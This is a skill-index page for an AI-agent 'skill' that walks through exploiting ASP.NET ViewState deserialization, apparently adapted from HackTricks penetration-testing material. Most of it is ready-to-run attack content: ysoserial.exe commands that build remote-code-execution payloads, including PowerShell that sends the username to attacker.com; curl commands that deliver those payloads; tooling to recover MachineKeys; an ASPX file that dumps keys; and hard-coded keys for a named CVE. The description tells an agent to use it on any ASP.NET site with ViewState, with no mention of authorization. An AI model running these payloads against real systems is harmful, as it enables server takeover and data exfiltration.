OpenSkillIndex← back to search

Hacktricks-skills exploit-aspnet-viewstate

Exploit ASP.NET ViewState deserialization vulnerabilities. Use this skill whenever you need to assess, enumerate, or exploit __VIEWSTATE parameters in ASP.NET applications. This includes discovering MachineKeys, generating payloads with YSoSerial.Net, and handling various .NET version configurations (pre-4.5 and 4.5+). Trigger this skill for any ASP.NET ViewState security assessment, penetration testing, or vulnerability research involving __VIEWSTATE, __VIEWSTATEGENERATOR, or __VIEWSTATEENCRYPTED parameters. Make sure to use this skill when you see ASP.NET applications with ViewState parameters, need to test for deserialization vulnerabilities, or are investigating potential MachineKey exposure.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/deserialization/exploiting-__viewstate-parameter/SKILL.MD
source content

ASP.NET ViewState Deserialization Exploitation

This skill guides you through identifying and exploiting ASP.NET ViewState deserialization vulnerabilities across different .NET versions and security configurations.

Quick Start Workflow

  1. Identify ViewState parameters in the target application
  2. Determine security configuration (MAC enabled, encryption enabled, .NET version)
  3. Discover MachineKey using Blacklist3r or Badsecrets
  4. Generate payload with YSoSerial.Net
  5. Test exploitation and verify code execution

ViewState Configuration Matrix

.NET VersionMACEncryptionMachineKey RequiredTool
AnyDisabledDisabledNoYSoSerial.Net
< 4.5EnabledDisabledYesBlacklist3r
< 4.5AnyEnabledYesBlacklist3r (in development)
>= 4.5AnyAnyYesBlacklist3r

Step 1: Identify ViewState Parameters

Capture HTTP requests with BurpSuite and look for:

  • __VIEWSTATE
    - The serialized state data
  • __VIEWSTATEGENERATOR
    - Used for MAC calculation
  • __VIEWSTATEENCRYPTED
    - Indicates encrypted ViewState

Step 2: Determine Security Configuration

MAC Protection (EnableViewStateMac)

  • If 
    __VIEWSTATE
    is base64 only (no MAC), MAC is disabled
  • If 
    __VIEWSTATE
    includes MAC, it's enabled

Encryption (ViewStateEncryptionMode)

  • If 
    __VIEWSTATEENCRYPTED
    parameter exists, encryption is enabled
  • If ViewState appears as readable base64, encryption is disabled

.NET Version

  • Check response headers for ASP.NET version
  • Look for 
    X-AspNet-Version
    header
  • Test with different payload formats

Step 3: Discover MachineKey

Using Badsecrets (Python, cross-platform)

# Direct ViewState analysis
python examples/blacklist3r.py --viewstate <VIEWSTATE> --generator <GENERATOR>

# URL-based extraction
python examples/blacklist3r.py --url http://target/page.aspx

# With custom keylist
bbot -f subdomain-enum -m badsecrets --badsecrets-keylist custom_keys.txt -t target.tld

Using Blacklist3r (Windows, .NET)

AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata <VIEWSTATE> --decrypt --purpose=viewstate --modifier=<GENERATOR> --macdecode --TargetPagePath "/path/to/page.aspx" -f out.txt --IISDirPath="/"

Step 4: Generate Payload with YSoSerial.Net

Basic payload (no MAC, no encryption)

ysoserial.exe -o base64 -g TypeConfuseDelegate -f ObjectStateFormatter -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName"

With MAC protection

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --generator=<GENERATOR> --validationalg="SHA1" --validationkey="<KEY>"

With encryption

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "powershell.exe Invoke-WebRequest -Uri http://attacker.com/$env:UserName" --path="/path/to/page" --apppath="/" --decryptionalg="AES" --decryptionkey="<KEY>" --validationalg="SHA1" --validationkey="<KEY>"

With ViewStateUserKey

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "command" --viewstateuserkey="<USERKEY>"

Minified payload (for WAF evasion)

ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "whoami" --validationkey="<KEY>" --validationalg=SHA1 --decryptionkey="<KEY>" --decryptionalg=AES --generator=<GEN> --minify

Step 5: Test Exploitation

Send the payload via:

curl -d "__VIEWSTATE=<PAYLOAD>" http://target/page.aspx

Or with POST data:

curl -d "__VIEWSTATE=$(cat payload.txt)" http://target/page.aspx

Success Indicators

  • 500 Internal Server Error with "The state information is invalid for this page and might be corrupted"
  • Out-of-band request to attacker server
  • Command execution on target

Special Scenarios

ViewState not in cookie

If ViewState isn't sent by the server, add it to the request body:

curl -d "__VIEWSTATE=<PAYLOAD>" http://target/page.aspx

.NET < 4.5 with Encryption

Remove 

__VIEWSTATEENCRYPTED
parameter to send unencrypted payload:

# Remove __VIEWSTATEENCRYPTED from request

Dumping MachineKeys via Reflection

If you can upload ASPX files:

<%@ Import Namespace="System.Web.Configuration" %>
<%@ Import Namespace="System.Reflection" %>
<script runat="server">
public void Page_Load(object sender, EventArgs e)
{
    var asm = Assembly.Load("System.Web");
    var sect = asm.GetType("System.Web.Configuration.MachineKeySection");
    var m = sect.GetMethod("GetApplicationConfig", BindingFlags.Static | BindingFlags.NonPublic);
    var cfg = (MachineKeySection)m.Invoke(null, null);
    Response.Write($"{cfg.ValidationKey}|{cfg.DecryptionKey}|{cfg.Decryption}|{cfg.CompatibilityMode}");
}
</script>

Known Hard-coded Keys

Gladinet CentreStack / Triofox (CVE-2025-30406)

ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "calc.exe" \
  --validationkey=ACC97055B2A494507D7D7C92DC1C854E8EA7BF4C \
  --validationalg=SHA1 \
  --decryptionkey=1FB1DEBB8B3B492390B2ABC63E6D1B53DC9CA2D7 \
  --decryptionalg=AES --generator=24D41AAB --minify

Common Gadgets

  • TypeConfuseDelegate
    - General purpose
  • TextFormattingRunProperties
    - ViewState specific
  • WinFormsUI
    - Windows Forms UI gadgets
  • WPF
    - WPF specific gadgets

References